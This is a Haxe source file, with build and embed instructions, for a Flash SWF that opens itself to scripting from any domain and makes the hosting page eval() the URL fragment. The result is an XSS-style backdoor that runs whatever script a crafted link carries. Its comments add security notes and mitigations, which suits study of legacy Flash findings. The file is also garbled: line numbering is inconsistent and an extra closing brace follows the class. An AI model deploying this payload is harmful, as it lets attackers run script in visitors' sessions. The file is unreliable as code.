1 // xss.hx
2 //
3 // Purpose:
4 //    This haxe source file builds a SWF which injects JavaScript into the including page.
5 //
6 // To build:
7 //   1. Acquire the latest stable version of haxe from http://haxe.org/download
8 //      Note: To run haxe, you may also need Neko (http://nekovm.org/download)
9 //   2. Create a file called Xss.hx (the class below is named Xss, and haxe requires the file name to match) with these contents.
10 //   3. Create a file called compile.hxml with the following content:
11 //      -swf-version 9
12 //      -swf xss.swf
13 //      -main Xss
14 //   4. From the command line, execute:
15 //      haxe compile.hxml
16 //
17 // To activate:
18 //   1. Take xss.swf generated by haxe and deploy it to your webserver.
19 //   2. Embed it into your HTML file with code like the following:
20 //      <object
21 //          id="xss" class="hidden"
22 //          classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
23 //          codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
24 //          <param name="movie" value="xss.swf" />
25 //          <param name="allowScriptAccess" value="always" />
26 //          <embed
27 //              class="hidden"
28 //              src="xss.swf"
29 //              allowScriptAccess="always"
30 //              type="application/x-shockwave-flash"
31 //              pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"> 
32 //          </embed>
33 //      </object>
34 //
35
36 import flash.external.ExternalInterface;
37
class Xss {

    // Entry point of the SWF. Everything happens at load time: the SWF
    // opens itself to scripting from any domain and then asks the hosting
    // page to run a small piece of JavaScript.
    //
    // Security notes (for anyone assessing a page that embeds this or a
    // similar SWF):
    //   * allowDomain("*") lets SWF content served from ANY domain script
    //     this movie, so no origin restriction applies on the Flash side.
    //   * ExternalInterface.call only reaches the page when the embed
    //     grants allowScriptAccess="always" (see the <object>/<embed>
    //     snippet in the header). With "sameDomain" or "never" the call
    //     is blocked by the player, which is the intended mitigation for
    //     SWFs loaded from a different or untrusted origin.
    //   * The string passed below, once joined, is
    //       (function(){setTimeout("eval(document.location.hash.slice(1))",0);})
    //     i.e. the page is told to eval() whatever follows the '#' in its
    //     own URL, in the embedding page's origin. Any attacker-controlled
    //     link to such a page therefore yields script execution; the usual
    //     defences are not embedding untrusted SWFs, restricting
    //     allowScriptAccess, and a CSP with a tight object-src.
    //   * Adobe Flash Player reached end of life at the end of 2020 and is
    //     blocked by current browsers, so this vector mainly matters for
    //     legacy plugin deployments and for understanding older findings.
    public static function main() {
        // Remove the cross-domain scripting restriction entirely.
        flash.system.Security.allowDomain("*");
        // Hand the joined JavaScript function to the hosting page; it
        // defers via setTimeout(..., 0) and evals the URL fragment.
        ExternalInterface.call( [ "(function(){setTimeout(\"",
            "eval(document.location.hash.slice(1))",
        "\",0);})" ].join('') );
    }
    
}
46     
47 }